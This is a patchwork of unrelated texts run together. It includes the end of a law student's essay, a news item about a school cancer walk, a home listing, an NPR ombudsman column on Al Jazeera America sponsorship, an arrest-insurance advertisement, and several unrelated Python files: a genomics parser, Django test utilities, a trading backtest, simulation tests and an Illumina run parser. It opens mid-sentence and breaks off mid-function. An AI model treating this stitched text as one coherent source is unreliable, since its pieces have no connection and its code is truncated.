badly mistaken. Confronting them and overcoming them alongside your classmates is what will bring you all together. Remain open to the amazing collection of individuals you will meet in your time at HLS because, with over 1,500 classmates, you WILL meet amazing individuals. You will undoubtedly have your share of fears — we all did and do — but don’t allow the fear of letting people in be one of them. Let people in and they just might surprise you. Hector Grajeda is a 3L. He is the vice president of communications of La Alianza.
#!/usr/bin/python import re,sys, getopt ##################################### # last update 03/31/2013 by J. Mass # # version = '0.1' # ##################################### def usage(): print (""" ############################## # Scythe_gff2loc.py v0.1 # ############################## -f, --file=gff3_FILE (tested w/ _gene.gff3 from phytozome) -o, --output=FILE output file [default: gff3_FILE.loc] -h, --help prints this """) sys.exit(2) def read_gff2loc(infile, outfile): infile = open(infile, 'r') outfile = open(outfile, 'w') loci = {} longest = {} rawstr = r"""(Name=)(.*);pacid.*(longest=)(.*);(Parent=)(.*)""" cnt = 0 for ln in infile: s =ln m = re.findall(rawstr, s) if len(m) >0: name = m[0][1] isLongest = m[0][3] parent = m[0][5] if isLongest == str(1): if parent in longest: print("#Warning "+parent+" has more than one default model\nCheck your gff -> ", longest[parent], name) longest[parent]=name #longest will be printed to 2nd col elif isLongest == str(0): if parent in loci: loci[parent].append(name) else: loci[parent]=[name] s_def = sorted(longest.keys()) for k_def in s_def: try: outfile.write(k_def+"\t"+longest[k_def]+"\t"+"\t".join(loci[k_def])+"\n") except KeyError as ke: outfile.write(k_def+"\t"+longest[k_def]+"\n") if k_def in loci: del loci[k_def] s = sorted(loci.keys()) for k in s: try: outfile.write(k+"\t"+longest[k]+"\t"+"\t".join(loci[k])+"\n") except KeyError as ke: print("#Warning "+k+" has no default model\n") outfile.write(k+"\t"+"\t".join(loci[k])+"\n") return loci ################################### outfile = None infile = None ################################### try: opts, args = getopt.gnu_getopt(sys.argv[1:], "f:ho:", ["file=","help", "output="]) except getopt.GetoptError as err: print (str(err)) usage() for o, a in opts: if o in ("-f", "--file"): infile=a elif o in ("-h", "--help"): usage() elif o in ("-o", "--output"): outfile = a else: assert False, "unhandled option" ######################################## if infile is None: usage() if outfile is None: outfile = infile+".loc" ######################################## read_gff2loc(infile, outfile)
The Johnson High School Atom Smashers replaced their orange and blue school colors with pink Wednesday in support of Breast Cancer Awareness Month. Participants from the campus and community paid $10 each to walk a trail around the campus. Prizes were awarded to groups that walked the most laps. Student groups also collected donations and sold breast cancer ribbon pins. About $250 was raised, and all proceeds will benefit the American Cancer Society and the Georgia Cancer Society. This is the second year Johnson High has hosted the "Making Strides to Smash Cancer" walk. Senior Amanda Amyx said she participates because the cause is important to her. "My grandmother had breast cancer, and she was finally cured last week - 100 percent cancer-free," she said. "I do this so people know how important it is to have exams and to be aware of what is happening with their health." During the month of October, public service organizations, professional medical associations and government agencies across the country host activities to increase awareness about breast cancer and raise funds for prevention and research. "It is important for everyone to support this initiative because many of us have been affected by cancer in some way. It may have been a personal experience or through the experience of a loved one," said Johnson High teacher Bettina Tate.
""" Testing utilities backported from recent Django versions, for testing with older Django versions. """ from __future__ import with_statement from django.conf import settings, UserSettingsHolder from django.utils.functional import wraps class override_settings(object): """ Acts as either a decorator, or a context manager. If it's a decorator it takes a function and returns a wrapped function. If it's a contextmanager it's used with the ``with`` statement. In either event entering/exiting are called before and after, respectively, the function/block is executed. """ def __init__(self, **kwargs): self.options = kwargs self.wrapped = settings._wrapped def __enter__(self): self.enable() def __exit__(self, exc_type, exc_value, traceback): self.disable() def __call__(self, func): @wraps(func) def inner(*args, **kwargs): with self: return func(*args, **kwargs) return inner def enable(self): override = UserSettingsHolder(settings._wrapped) for key, new_value in self.options.items(): setattr(override, key, new_value) settings._wrapped = override def disable(self): settings._wrapped = self.wrapped
This beautifully appointed four bedroom (plus additional bonus room), two full bathrooms, nearly 3000 SQ FT, two car garage (with electric vehicle charging station and OVERSIZED H2O heater), sparkling swimming pool, ginormous gourmet kitchen complete with island/great room/dining combo for family togetherness and fantastic floor plan can be yours if you act fast!!! The owner have installed many high end fixtures throughout that make this home just shine with pride of ownership. They have recently installed wood look porcelain throughout that looks amazing and is easy to keep clean. Some of the other features include R/V gate, newly installed turf, inspected & fully fenced pool, security screen door on front of home, oversized hot water heater, energy efficient sunscreens, HUGE master, etc!
import os from zipfile import ZipFile from itertools import izip_longest from django.conf import settings from utils import save_to_file, save_to_zip, set_header, get_diff from apps.weapon.models import Weapon, ECM, Sensor, Repair, Construction, Brain, WeaponSound from apps.structure.models import Structure, StructureDefence, StructureWeapon, BodyDefence, Feature from apps.function.models import StructureFunction, Function from apps.body.models import Body, Propulsion, PropulsionSound, PropulsionType, BodyPropulsion from apps.templates.models import Template, TemplateWeapon from apps.research.models import (Research_Cam1, ResearchFunctions_Cam1, ResearchPreRequisites_Cam1, ResultStructure_Cam1, ResearchStructure_Cam1, ResultComponent_Cam1, ResearchObsoleteComponent_Cam1, ResearchObsoletStructure_Cam1, Research_Cam2, ResearchFunctions_Cam2, ResearchPreRequisites_Cam2, ResultStructure_Cam2, ResearchStructure_Cam2, ResultComponent_Cam2, ResearchObsoleteComponent_Cam2, ResearchObsoletStructure_Cam2,Research_Cam3, ResearchFunctions_Cam3, ResearchPreRequisites_Cam3, ResultStructure_Cam3, ResearchStructure_Cam3, ResultComponent_Cam3, ResearchObsoleteComponent_Cam3, ResearchObsoletStructure_Cam3,Research_Multiplayer, ResearchFunctions_Multiplayer, ResearchPreRequisites_Multiplayer, ResultStructure_Multiplayer, ResearchStructure_Multiplayer, ResultComponent_Multiplayer, ResearchObsoleteComponent_Multiplayer, ResearchObsoletStructure_Multiplayer) classes = [ Weapon, Feature, Construction, Structure, StructureFunction, Body, Propulsion, PropulsionSound, PropulsionType, StructureDefence, StructureWeapon, Function, BodyDefence, ECM, Sensor, Repair, BodyPropulsion, Brain, WeaponSound, Template, TemplateWeapon, Research_Cam1, ResearchFunctions_Cam1, ResearchPreRequisites_Cam1, ResultStructure_Cam1, ResearchStructure_Cam1, ResultComponent_Cam1, ResearchObsoleteComponent_Cam1, ResearchObsoletStructure_Cam1, Research_Cam2, ResearchFunctions_Cam2, ResearchPreRequisites_Cam2, ResultStructure_Cam2, ResearchStructure_Cam2, ResultComponent_Cam2, ResearchObsoleteComponent_Cam2, ResearchObsoletStructure_Cam2,Research_Cam3, ResearchFunctions_Cam3, ResearchPreRequisites_Cam3, ResultStructure_Cam3, ResearchStructure_Cam3, ResultComponent_Cam3, ResearchObsoleteComponent_Cam3, ResearchObsoletStructure_Cam3,Research_Multiplayer, ResearchFunctions_Multiplayer, ResearchPreRequisites_Multiplayer, ResultStructure_Multiplayer, ResearchStructure_Multiplayer, ResultComponent_Multiplayer, ResearchObsoleteComponent_Multiplayer, ResearchObsoletStructure_Multiplayer ] classes = [x for x in classes if x.objects.count()] def save_all(): [set_header(x) for x in classes if not x.load_from_first] texts = [cls.get_data() for cls in classes] diffs = [get_diff(cls, text) for cls, text in zip(classes, texts)] if settings.MOD_SOURCE: [save_to_file(cls, text) for cls, text in zip(classes, texts)] else: zf = ZipFile(settings.PATH_TO_MOD) names = set(zf.namelist()) - set([x.FILE_PATH for x in classes]) data = [(path, zf.read(path)) for path in names] zf.close() zf = ZipFile(settings.PATH_TO_MOD, 'w') [save_to_zip(cls, zf, text) for cls, text in zip(classes, texts)] [zf.writestr(file, text) for file, text in data] zf.close() return diffs def save_xml(): 'does not work with archive' texts = [cls.get_xml() for cls in classes] [save_to_file(cls, text, format='xml') for cls, text in zip(classes, texts)] return [['Saved to XML', [('green', 'ok')]]]
First product is under development! Shewstone Publishing's first product will be an original pen-and-paper roleplaying game of historical fantasy, set in Renaissance Europe. We're in the very early stages. It is too early to say when this product will be ready, other than it will be in 2017 at the earliest. We'll announce further details when we can. At this time, we are concentrating on writing and producing this game, and are not planning to start any additional projects until this one is finished.
from __future__ import absolute_import, division, print_function, unicode_literals import pandas as pd import numpy as np from pythonToolbox.toolbox import backtest def settings(): exchange = "stocks" # Exchange to download data for (nyse or nasdaq) markets = ['A','AAPL','IBM','GOOG','C'] # Stocks to download data for. # Leave blank to download all stocks for the exchange (~900 stocks) date_start = '2015-01-03' # Date to start the backtest date_end = '2016-11-06' # Date to end the backtest lookback = 120 # Number of days you want historical data for """ To make a decision for day t, your algorithm will have historical data from t-lookback to t-1 days""" return [exchange, markets, date_start, date_end, lookback] def trading_strategy(lookback_data): """ :param lookback_data: Historical Data for the past "lookback" number of days as set in the main settings. It is a dictionary of features such as, 'OPEN', 'CLOSE', 'HIGH', 'LOW', 'VOLUME', 'SLIPPAGE', 'POSITION', 'ORDER', 'FILLED_ORDER', 'DAILY_PNL', 'TOTAL_PNL', 'FUNDS', 'VALUE' Any feature data can be accessed as:lookback_data['OPEN'] The output is a pandas dataframe with dates as the index (row) and markets as columns. """""""""""""""""""""""""" """""""""""""""""""""""""" To see a complete list of features, uncomment the line below""" #print(lookback_data.keys()) """"""""""""""""""""""""""" :return: A pandas dataframe with markets you are trading as index(row) and signal, price and quantity as columns order['SIGNAL']:buy (+1), hold (0) or sell (-1) trading signals for all securities in markets[] order['PRICE']: The price where you want to trade each security. Buy orders are executed at or below the price and sell orders are executed at or above the price order['QUANTITY']: The quantity of each stock you want to trade. System will buy the specified quantity of stock if it's price <= price specified here System will sell the specified quantity of a stock if it's price >= price specified here """ """IMPORTANT: Please make sure you have enough funds to buy or sell. Order is cancelled if order_value > available funds(both buy and short sell)""" order = pd.DataFrame(0, index=lookback_data['POSITION'].columns, columns = ['SIGNAL','WEIGHTS','PRICE']) ##YOUR CODE HERE period1 = 120 period2 = 30 markets_close = lookback_data['CLOSE'] market_open = lookback_data['OPEN'] avg_p1 = markets_close[-period1 : ].sum() / period1 avg_p2 = markets_close[-period2 : ].sum() / period2 sdev_p1 = np.std(markets_close[-period1 : ], axis=0) difference = avg_p1 - avg_p2 deviation = pd.Series(0, index=lookback_data['POSITION'].columns) criteria_1 = np.abs(difference)>sdev_p1 criteria_2 = np.sign(difference) == np.sign(lookback_data['POSITION']) deviation[criteria_1] = difference deviation[criteria_2] = difference total_deviation = np.absolute(deviation).sum() if total_deviation==0: return order else: order['WEIGHTS']= np.absolute(deviation/total_deviation) order['SIGNAL'] = np.sign(deviation) # order['PRICE'][order['SIGNAL']>0] = (avg_p1-sdev_p1)[order['SIGNAL']>0] # order['PRICE'][order['SIGNAL']<0] = (avg_p1+sdev_p1)[order['SIGNAL']<0] return order if __name__ == '__main__': [exchange, markets, date_start, date_end, lookback] = settings() backtest(exchange, markets, trading_strategy, date_start, date_end, lookback)#,verbose=True)
The Patriotism Of NPR And Its Sponsor Al Jazeera America : NPR Public Editor Images on Al Jazeera of brutalized Americans in Iraq understandably still trouble some listeners, but NPR's acceptance of sponsorship support from the new Al Jazeera America fall well within free speech and ethical standards. Al Jazeera itself brings a valuable international voice into our living rooms. Joie Chen, host of the new Al Jazeera America nightly news program America Tonight, sits at the anchor desk in the network's studio space at the Newseum in Washington, D.C. "I respect the right of the Muslim world to have more of a voice and presence in the world and the United States," Becky Miller of Charleston, S.C., wrote. "Heavens knows, they need better press than what their extremists have offered in the last decade. But the images of the beheadings and the swinging charred bodies of Americans still haunt me." The only aired beheading turned out to be a hoax according to an overview of Al Jazeera's coverage by Pew Research Center's Project for Excellence in Journalism. But the network did air other graphic images as well as statements by Osama bin Laden. You would not accept money/ads from other organizations that have hurt Americans in the past (KKK, white supremacists, or other hate organizations), regardless of claims that they are just news reporters. Al Jazeera forfeited the right to be treated as just a newspaper [sic] when it acted as a mouthpiece for enemies, published their propaganda, and displayed news and video proudly displaying American deaths. I found it too hard to listen to NPR this morning after you played the Al Jazerra ad. It was easier to drive in silence. Last week I heard an interview between an NPR reporter and people representing Al-Jazeera, as well as some media critics. Do you folks really believe that news network is going to give free reign to American journalists and writers? If you believe that then I have some beach property in Tulsa that should interest you. I hope I am wrong. I mean that. Perhaps the proof is about to be found in the pudding. If the US strikes Syria, then let's see how Al-Jazeera covers that in the U.S. As a veteran, I am sensitive to images of killed soldiers, but we must protect the free speech we fight for in the first place. I sympathize with the sentiments behind these criticisms, but upon mulling over the stories and the ads, I am afraid that I cannot agree. The ethical issue over NPR's stories comes down to trust. The patriotism concern comes down to free speech. The question of naïveté comes down to changing bias standards and a look at Al Jazeera America itself. I have dealt at length in earlier posts with the ethics surrounding stories and sponsors. NPR stories that deal in some way with a sponsor generally need not mention the relationship any more than stories in the commercial news media are not expected to mention an advertiser. Advertising and sponsorship are effectively the same, transparently heard on-air or seen online. There is no secret that needs to be divulged. To be eligible as a tax write-off, public media sponsorships must follow certain rules, such as length and call to action, but this has nothing to do with a need for transparency. NPR's large number of such sponsors, meanwhile, further guarantees that no single one has influence, if ever one tried to exert it, which in real life almost all know not to do. This is because the newsroom jealously guards its independence from behind an iron wall that separates the business and news sides inside the organization, as much as some cynics do not want to believe it. This is not an issue in our newsroom or for NPR's journalists. We do not experience pressure to craft our journalism to suit the interests and desires of our sponsors. NPR receiving sponsorship support from Al Jazeera has not and will not influence our editorial decision-making regarding Al Jazeera or its financial backers. There are exceptions when a sponsorship should be mentioned in a story, such as if the story has to do with a company's advertising strategy. The Al Jazeera campaign might make for just such a story, but that is an editorial decision. As it is, no matter where one draws the line for added transparency, there will be always a fundamental element of trust: either you trust the independence of NPR's editorial process or you don't. I do, barring some good reason not to. Whether NPR should even accept the sponsorship from Al Jazeera is a separate matter of management policy that is outside my purview. But I do have a vital interest in anything that restricts free speech, and this essentially is what the complaining listeners want to do. Being a veteran myself of an earlier war, Vietnam, I am viscerally sensitive to the treatment of American soldiers by the enemy and by the news media. But this has to be balanced against the need to protect the freedoms that we fight to defend in the first place. One of the most fundamental of those freedoms is free speech, even — or especially — when it is speech we don't like. I am not one of those journalists who believe that there are almost no limits to free speech or free press. But the Al Jazeera ads and the objectionable earlier Al Jazeera coverage come nowhere near what I think any reasonable American would consider the limit, once we stop to think about it. Al Jazeera's Arabic service is not anti-American, best I can tell from former students of mine who work there and other Arabic speakers I trust. But whether the coverage is anti-American is irrelevant in our free society. Anyway, those earlier images more than anything represented a lapse in what we consider broadcast standards of decency. I disagree with running such footage, but Al Jazeera was not alone around the world and even in the U.S. in doing so. Many serious people, moreover, support showing gruesome pictures of war as a testament to a reality that we too easily forget. What is most relevant is that the network is not characterized by hate speech, according even to American diplomats and military leaders I know. Unlike some of my colleagues and free speech advocates, I draw a line on propagating or even repeating hate speech, except when reporting on the depths of the hatred or the speech itself. Defining hate speech is a judgment call, but so is so much in life. The sad truth is that much of the world is skeptical of American intentions, but this is missing in our media. The Arabic service, and another English one that is widely viewed in Europe and elsewhere, does frame world politics through a lens that is often skeptical of American intentions. The sad truth of the matter, however, is that much — and probably most — of the rest of the world shares the skepticism. So, too, do many Americans. This is in part a legacy of repeated American military interventions in developing nations, however justified each might be or have seemed. This understanding of how we have come to be seen in the world was a main reason that the parliament of our closest ally, Great Britain, voted against militarily punishing Syria for doing something so obviously terrible as using sarin gas on its people. Across the Muslim world, for example, internal groups that share our values oppose our interventions as counter-productive. The same is true in Latin America and other parts of the world. Yet, little of this international reality comes through in the American news media, which is largely Washington-centric or views the world as a matter of internal American political debates. We should in fact welcome that Al Jazeera might bring a more global view into our living rooms, if only to better know what others are thinking. Al Jazeera America, after one month on the air, has so far proven itself to be straightforward in its news presentation, perhaps more even than its CNN, Fox and MSNBC competitors. The network has set out to be more like the BBC or the early CNN, with lots and lots of real news. It draws on a far larger network of news bureaus across the country and around the world than the others. The most common message conveyed in Al Jazeera's coverage-that the U.S. should get involved in the conflict-was also the No. 1 message on CNN, MSNBC and Fox News. BBC News America news programming, some of which originates in London, was more of an outlier in its coverage of Syria. The sources cited most often in coverage by the U.S. cable channels-American politicians and policymakers-were also by far the most frequent in Al Jazeera America's coverage. And as was the case with CNN, Fox News and MSNBC, the overwhelming majority of Al Jazeera America's coverage originated from the two main U.S. news hubs-Washington, D.C., and New York City. The logo for the cable news network Al Jazeera America appears outside the network's studio space at the Newseum in Washington, D.C. I personally hope this doesn't mean the network, in trying to be accepted, will be too timid. This would deny us the full force of those other voices in the world. But each of us will have our own opinion of the network's framing, just as we will have our own on American policy. Will Al Jazeera America pull its punches in reporting on Qatar or causes dear to its monarchy? Maybe. It hasn't done so yet with the Syrian rebels, whom the emirate supports. Some of the network's highly respected American journalists, such as John Siegenthaler, Joie Chen and Antonio Mora, publicly assert that they will maintain their independence. The president of the network, Kate O'Brian, a former ABC News executive, has said the same. But questions of bias or independence are irrelevant when it comes to whether NPR should accept sponsorship or cable networks should carry the new network. Many news outlets have a bias. What matters is whether Al Jazeera America's falls within the acceptable boundaries of decency and free speech, and clearly it does. As it is, the trend in American journalism is toward news outlets with identifiable points of view. Fox News on the right, MSNBC on the left and Univision on common Latino issues are only the three most prominent television examples. Driving the trend are changing business models and the political fragmentation of the market into ever finer political slices by the internet and cable. Meanwhile, other international players such as the Chinese and the Russians are coming in, too. We should not be afraid of these many new voices. Democracy does quite well in Europe, Japan and other parts of the world where the news media has long been identified with ideological, party or individual points of view. American news networks such as CNN are present on cable channels in the rest of the world, including, specifically, Qatar. What counts for American democracy is that we uphold our free speech values and let the best ideas win in the marketplace of open debate. Updated Sept. 17 11:50 a.m. A sentence was added to clarify that the beheading aired on Al Jazeera turned out to be a hoax, according to an overview of Al Jazeera's coverage by Pew Research Center's Project for Excellence in Journalism.
import pytest def test_oommf_sim(): import oommf import os.path oommf.path = "/home/vagrant/oommf-python/oommf/oommf/" Py = oommf.materials.permalloy my_geometry = oommf.geometry.Cuboid( (0, 0, 0), (30, 30, 100), unitlength=1e-9) sim = oommf.Simulation(my_geometry, cellsize=5e-9, material=Py) sim.m = [1, 1, 0] assert str(sim) == 'Simulation: Py(Fe80Ni20). \n\tGeometry: Cuboid corner1 = (0, 0, 0), corner2 = (30, 30, 100). \n\t Cells = [6, 6, 20], total=720.' sim.advance_time(1e-9) assert str(sim) == 'Simulation: Py(Fe80Ni20). \n\tGeometry: Cuboid corner1 = (0, 0, 0), corner2 = (30, 30, 100). \n\t Cells = [6, 6, 20], total=720.\n\tCurrent t = 1e-09s' assert os.path.isfile('Simulation_0.0_1e-09.mif') os.system('rm Simulation_0.0_1e-09.mif') @pytest.mark.xfail def test_mif_assemble(): import oommf import oommf.mifgen NiFe = oommf.materials.NiFe my_geometry = oommf.geometry.Cuboid( (0, 0, 0), (310, 310, 40), unitlength=1e-9) sim = oommf.Simulation(my_geometry, cellsize=5e-9, material=NiFe) mifpath = oommf.mifgen._assemble_mif(sim) f = open(mifpath, 'r') f2 = open('oommf.oommfpath' + '/app/oxs/examples/square.mif') constructed_miffile = f.read() read_miffile = f2.read() assert constructed_miffile == read_miffile def test_material(): import oommf.materials assert str(oommf.materials.permalloy) == 'Py(Fe80Ni20)' assert oommf.materials.permalloy.A == 13e-12
Being arrested or having legal proceedings taken up against you is a situation that is completely unanticipated. Defend yourself against legal problems by selecting Legal Liability Protection to defend you and your loved ones. Choosing defense through Arrest Insurance means you never have to worry about how to make it through the case. Safeguard your family and yourself with this first-rate insurance which will help you through your trial from start to finish. Help is always on hand from our Legal Plan Underwriters and customer service team who are always happy to assist and answer any questions you may have. Contact Legal Liability Protection at (855) 440-2245 to get started with Arrest and Legal Liability Insurance in Bryan, Texas today! Bail Bonds Bail Shop, LLC, teamed up with Legal Liability Protection, gives you bail service and discreet service to help you with your situation. In order to continue on your job, it is important to protect yourself from the risk of litigation. In case of a legal case, Legal Liability Protection knows that you need first-rate insurance as a safeguard. If you have questions, our Legal Plan Underwriters are always available to assist you and supply you with the answers you need. We can provide the correct coverage for your requirements, whether you are seeking professional coverage or family coverage. All of your legal needs as well as arrest insurance for Bryan, TX are available through Legal Liability Protection. When dealing with court or arrested, know your options and safeguard yourself with the Discount Legal Plan. With your legal plans, your case is automatically assigned a Criminal Defense Lawyer from our Nationwide Attorney Network who will help direct you through the difficult legal system and defend your rights. Regardless of where you may be when you need help, our first-rate defense lawyers are always available to assist you. The defense you need is available when you need it when you contact our 24-hour hotline. If you have been given charges, Legal Liability Protect may even provide you with bail bonds to get you out from behind bars and back home. Our bonds services are offered to aid you no matter your situation, getting you processed and out quickly. When your time of need comes, Legal Liability Protection will give you the services you need for your protection. If you have any questions, our legal plan underwriters are always available for you. Call Legal Liability Protection today at (855) 440-2245 to chat with our Legal Plan Underwriters about your needs for arrest insurance in Bryan, TX.
import re import os import csv import xml.etree.ElementTree as ET import logging import glob from datetime import datetime from collections import OrderedDict from bs4 import BeautifulSoup #html parser class RunParser(object): """Parses an Illumina run folder. It generates data for statusdb notable attributes : :RunInfoParser runinfo: see RunInfo :RunParametersParser runparameters: see RunParametersParser :SampleSheetParser samplesheet: see SampleSheetParser :LaneBarcodeParser lanebarcodes: see LaneBarcodeParser """ def __init__(self, path): if os.path.exists(path): self.log=logging.getLogger(__name__) self.path=path self.parse() self.create_db_obj() else: raise os.error(" flowcell cannot be found at {0}".format(path)) def parse(self, demultiplexingDir='Demultiplexing'): """Tries to parse as many files as possible from a run folder""" fc_name=os.path.basename(os.path.abspath(self.path)).split('_')[-1][1:] rinfo_path=os.path.join(self.path, 'RunInfo.xml') rpar_path=os.path.join(self.path, 'runParameters.xml') ss_path=os.path.join(self.path, 'SampleSheet.csv') lb_path=os.path.join(self.path, demultiplexingDir, 'Reports', 'html', fc_name, 'all', 'all', 'all', 'laneBarcode.html') ln_path=os.path.join(self.path, demultiplexingDir, 'Reports', 'html', fc_name, 'all', 'all', 'all', 'lane.html') undeterminedStatsFolder = os.path.join(self.path, demultiplexingDir, "Stats") cycle_times_log = os.path.join(self.path, 'Logs', "CycleTimes.txt") try: self.runinfo=RunInfoParser(rinfo_path) except OSError as e: self.log.info(str(e)) self.runinfo=None try: self.runparameters=RunParametersParser(rpar_path) except OSError as e: self.log.info(str(e)) self.runParameters=None try: self.samplesheet=SampleSheetParser(ss_path) except OSError as e: self.log.info(str(e)) self.samplesheet=None try: self.lanebarcodes=LaneBarcodeParser(lb_path) except OSError as e: self.log.info(str(e)) self.lanebarcodes=None try: self.lanes=LaneBarcodeParser(ln_path) except OSError as e: self.log.info(str(e)) self.lanes=None try: self.undet=DemuxSummaryParser(undeterminedStatsFolder) except OSError as e: self.log.info(str(e)) self.undet=None try: self.time_cycles = CycleTimesParser(cycle_times_log) except OSError as e: self.log.info(str(e)) self.time_cycles = None def create_db_obj(self): self.obj={} bits=os.path.basename(os.path.abspath(self.path)).split('_') name="{0}_{1}".format(bits[0], bits[-1]) self.obj['name']=name if self.runinfo: self.obj['RunInfo']=self.runinfo.data if self.runinfo.recipe: self.obj['run_setup']=self.runinfo.recipe if self.runparameters: self.obj.update(self.runparameters.data) if self.runparameters.recipe: self.obj['run_setup']=self.runparameters.recipe if self.samplesheet: self.obj['samplesheet_csv']=self.samplesheet.data if self.lanebarcodes: self.obj['illumina']={} self.obj['illumina']['Demultiplex_Stats']={} self.obj['illumina']['Demultiplex_Stats']['Barcode_lane_statistics']=self.lanebarcodes.sample_data self.obj['illumina']['Demultiplex_Stats']['Flowcell_stats']=self.lanebarcodes.flowcell_data if self.lanes: self.obj['illumina']['Demultiplex_Stats']['Lanes_stats']=self.lanes.sample_data if self.undet: self.obj['Undetermined']=self.undet.result if self.time_cycles: self.obj['time cycles'] = self.time_cycles class DemuxSummaryParser(object): def __init__(self, path): if os.path.exists(path): self.path=path self.result={} self.TOTAL = {} self.parse() else: raise os.error("DemuxSummary folder {0} cannot be found".format(path)) def parse(self): #will only save the 50 more frequent indexes pattern=re.compile('DemuxSummaryF1L([0-9]).txt') for file in glob.glob(os.path.join(self.path, 'DemuxSummaryF1L?.txt')): lane_nb = pattern.search(file).group(1) self.result[lane_nb]=OrderedDict() self.TOTAL[lane_nb] = 0 with open(file, 'rU') as f: undeterminePart = False for line in f: if not undeterminePart: if "### Columns:" in line: undeterminePart = True else: #it means I am readng the index_Sequence Hit_Count components = line.rstrip().split('\t') if len(self.result[lane_nb].keys())< 50: self.result[lane_nb][components[0]] = int(components[1]) self.TOTAL[lane_nb] += int(components[1]) class LaneBarcodeParser(object): def __init__(self, path ): if os.path.exists(path): self.path=path self.parse() else: raise os.error(" laneBarcode.html cannot be found at {0}".format(path)) def parse(self): self.sample_data=[] self.flowcell_data={} with open(self.path, 'rU') as htmlfile: bsoup=BeautifulSoup(htmlfile) flowcell_table=bsoup.find_all('table')[1] lane_table=bsoup.find_all('table')[2] keys=[] values=[] for th in flowcell_table.find_all('th'): keys.append(th.text) for td in flowcell_table.find_all('td'): values.append(td.text) self.flowcell_data = dict(zip(keys, values)) keys=[] rows=lane_table.find_all('tr') for row in rows[0:]: if len(row.find_all('th')): #this is the header row for th in row.find_all('th'): key=th.text.replace('<br/>', ' ').replace('&gt;', '>') keys.append(key) elif len(row.find_all('td')): values=[] for td in row.find_all('td'): values.append(td.text) d=dict(zip(keys,values)) self.sample_data.append(d) class DemultiplexingStatsParser(object): def __init__(self, path ): if os.path.exists(path): self.path=path self.parse() else: raise os.error(" DemultiplexingStats.xml cannot be found at {0}".format(path)) def parse(self): data={} tree=ET.parse(self.path) root = tree.getroot() self.data=xml_to_dict(root) class SampleSheetParser(object): """Parses Samplesheets, with their fake csv format. Should be instancied with the samplesheet path as an argument. .header : a dict containing the info located under the [Header] section .settings : a dict containing the data from the [Settings] section .reads : a list of the values in the [Reads] section .data : a list of the values under the [Data] section. These values are stored in a dict format .datafields : a list of field names for the data section""" def __init__(self, path ): self.log=logging.getLogger(__name__) if os.path.exists(path): self.parse(path) else: raise os.error(" sample sheet cannot be found at {0}".format(path)) def generate_clean_samplesheet(self, fields_to_remove=None, rename_samples=True, rename_qPCR_suffix = False, fields_qPCR= None): """Will generate a 'clean' samplesheet, : the given fields will be removed. if rename_samples is True, samples prepended with 'Sample_' are renamed to match the sample name""" output="" if not fields_to_remove: fields_to_remove=[] #Header output+="[Header]{}".format(os.linesep) for field in self.header: output+="{},{}".format(field.rstrip(), self.header[field].rstrip()) output+=os.linesep #Data output+="[Data]{}".format(os.linesep) datafields=[] for field in self.datafields: if field not in fields_to_remove: datafields.append(field) output+=",".join(datafields) output+=os.linesep for line in self.data: line_ar=[] for field in datafields: value = line[field] if rename_samples and 'SampleID' in field : try: if rename_qPCR_suffix and 'SampleName' in fields_qPCR: #substitute SampleID with SampleName, add Sample_ as prefix and remove __qPCR_ suffix value =re.sub('__qPCR_$', '', 'Sample_{}'.format(line['SampleName'])) else: #substitute SampleID with SampleName, add Sample_ as prefix value ='Sample_{}'.format(line['SampleName']) except: #otherwise add Sample_ as prefix value = 'Sample_{}'.format(line['SampleID']) elif rename_qPCR_suffix and field in fields_qPCR: value = re.sub('__qPCR_$', '', line[field]) line_ar.append(value) output+=",".join(line_ar) output+=os.linesep return output def parse(self, path): flag=None header={} reads=[] settings=[] csvlines=[] data=[] flag= 'data' #in case of HiSeq samplesheet only data section is present with open(path, 'rU') as csvfile: for line in csvfile.readlines(): if '[Header]' in line: flag='HEADER' elif '[Reads]' in line: flag='READS' elif '[Settings]' in line: flag='SETTINGS' elif '[Data]' in line: flag='data' else: if flag == 'HEADER': try: header[line.split(',')[0]]=line.split(',')[1] except IndexError as e: self.log.error("file {} does not seem to be comma separated.".format(path)) raise RunTimeError("Could not parse the samplesheet, does not seem to be comma separated") elif flag == 'READS': reads.append(line.split(',')[0]) elif flag == 'SETTINGS': settings.append(line.split(',')[0]) elif flag == 'data': csvlines.append(line) reader = csv.DictReader(csvlines) for row in reader: linedict={} for field in reader.fieldnames: linedict[field]=row[field] data.append(linedict) self.datafields=reader.fieldnames self.data=data self.settings=settings self.header=header self.reads=reads class RunInfoParser(object): """Parses RunInfo.xml. Should be instancied with the file path as an argument. .data : a list of hand-picked values : -Run ID -Run Number -Instrument -Flowcell name -Run Date -Reads metadata -Flowcell layout """ def __init__(self, path ): self.data={} self.recipe=None self.path=path if os.path.exists(path): self.parse() else: raise os.error(" run info cannot be found at {0}".format(path)) def parse(self): data={} tree=ET.parse(self.path) root = tree.getroot() run=root.find('Run') data['Id']=run.get('Id') data['Number']=run.get('Number') data['Instrument']=run.find('Instrument').text data['Flowcell']=run.find('Flowcell').text data['Date']=run.find('Date').text data['Reads']=[] for read in run.find('Reads').findall('Read'): data['Reads'].append(read.attrib) layout=run.find('FlowcellLayout') data['FlowcellLayout']=layout.attrib self.data=data self.recipe=make_run_recipe(self.data.get('Reads', {})) def get_read_configuration(self): """return a list of dicts containig the Read Configuration """ readConfig = [] try: readConfig = self.data['Reads'] return sorted(readConfig, key=lambda r: int(r.get("Number", 0))) except IOError: raise RuntimeError('Reads section not present in RunInfo. Check the FC folder.') class RunParametersParser(object): """Parses a runParameters.xml file. This is a much more general xml parser, it will build a dict from the xml data. Attributes might be replaced if children nodes have the same tag as the attributes This does not happen in the current xml file, but if you're planning to reuse this, it may be of interest. """ def __init__(self, path ): self.data={} self.recipe=None self.path=path if os.path.exists(path): self.parse() else: raise os.error(" run parameters cannot be found at {0}".format(path)) def parse(self): data={} tree=ET.parse(self.path) root = tree.getroot() self.data=xml_to_dict(root) self.recipe=make_run_recipe(self.data.get('Setup', {}).get('Reads', {}).get('Read', {})) def make_run_recipe(reads): """Based on either runParameters of RunInfo, gathers the information as to how many readings are done and their length, e.g. 2x150""" nb_reads=0 nb_indexed_reads=0 numCycles=0 for read in reads: nb_reads+=1 if read['IsIndexedRead'] == 'Y': nb_indexed_reads+=1 else: if numCycles and numCycles != read['NumCycles']: logging.warn("NumCycles in not coherent") else: numCycles = read['NumCycles'] if reads: return "{0}x{1}".format(nb_reads-nb_indexed_reads, numCycles) return None def xml_to_dict(root): current=None children=list(root) if children: current={} duplicates={} for child in children: if len(root.findall(child.tag))>1: if child.tag not in duplicates: duplicates[child.tag]=[] lower=xml_to_dict(child) duplicates[child.tag].extend(lower.values()) current.update(duplicates) else: 